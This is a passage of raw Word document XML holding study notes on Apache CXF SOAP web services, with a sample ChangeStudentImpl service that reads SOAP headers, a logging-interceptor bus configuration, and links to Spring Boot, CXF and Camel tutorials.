          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>changeStudentNameName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(Student </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>student</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F7D22" w:rsidRDefault="008F7D22" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="00F97F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>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com.caps</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javax.jws.WebService</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org.apache.cxf.binding.soap.SoapMessage</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org.apache.cxf.headers.Header</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org.apache.cxf.message.Message</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org.apache.cxf.phase.PhaseInterceptor</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org.apache.cxf.phase.PhaseInterceptorChain</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org.w3c.dom.Element;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46464"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="646464"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebService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endpointInterface</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com.caps.ChangeStudent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</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lastRenderedPageBreak/>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ChangeStudentImpl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ChangeStudent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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Student </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>changeStudentNameName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(Student </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) {</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Message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PhaseInterceptorChain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getCurrentMessage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SoapMessage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soapMessage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SoapMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message</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List&lt;Header&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list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soapMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.getHeaders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(Header </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) {</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"Country: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+((Element)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.getObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getTextContent</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student</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.setName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.getName</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student</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pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>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com.caps</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setName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 {</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F7D22" w:rsidRDefault="008F7D22" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D761DCA" wp14:editId="75E7C00C">
            <wp:extent cx="3219450" cy="4124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450" cy="4124325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7D22" w:rsidRDefault="008F7D22" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE0961" w:rsidRDefault="00BE0961" w:rsidP="008F7D22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pP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org.apache.cxf.interceptor.LoggingInInterceptor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logInInterceptor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org.apache.cxf.interceptor.LoggingOutInterceptor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logOutInterceptor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cxf:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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cxf:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inInterceptors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bean</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logInInterceptor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cxf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:inInterceptors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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cxf:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outInterceptors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bean</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logOutInterceptor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cxf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:outInterceptors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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cxf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:bus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0961" w:rsidRDefault="00BE0961" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A15553" w:rsidRDefault="00A15553" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A15553" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidR="003B7671" w:rsidRPr="000D211D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>https://www.callicoder.com/spring-boot-rest-api-tutorial-with-mysql-jpa-hibernate/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003B7671" w:rsidRDefault="003B7671" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B7671" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidR="00E478C8" w:rsidRPr="000D211D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>https://www.callicoder.com/spring-boot-rest-api-tutorial-with-mysql-jpa-hibernate/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E478C8" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="00E478C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/docs/jax-rs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56443543" wp14:editId="6DAA8512">
            <wp:extent cx="5943600" cy="3230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30880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F6F8956" wp14:editId="6FF4C520">
            <wp:extent cx="5943600" cy="3596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596005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="009030EB" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4594" w:rsidRDefault="00CC4594" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4594" w:rsidRDefault="00CC4594" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4594" w:rsidRDefault="00CC4594" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4594" w:rsidRDefault="00CC4594" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009030EB" w:rsidRDefault="003B2BF4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D0343C9" wp14:editId="468519FD">
            <wp:extent cx="5943600" cy="3596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596005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidR="00CC4594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://camel.apache.org/components.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EC1D27" w:rsidRDefault="00EC1D27" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC1D27" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00FA1A00">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://camel.apache.org/tutorial-example-reportincident.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004F5DF3" w:rsidRDefault="004F5DF3" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F5DF3" w:rsidRDefault="004F5DF3" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
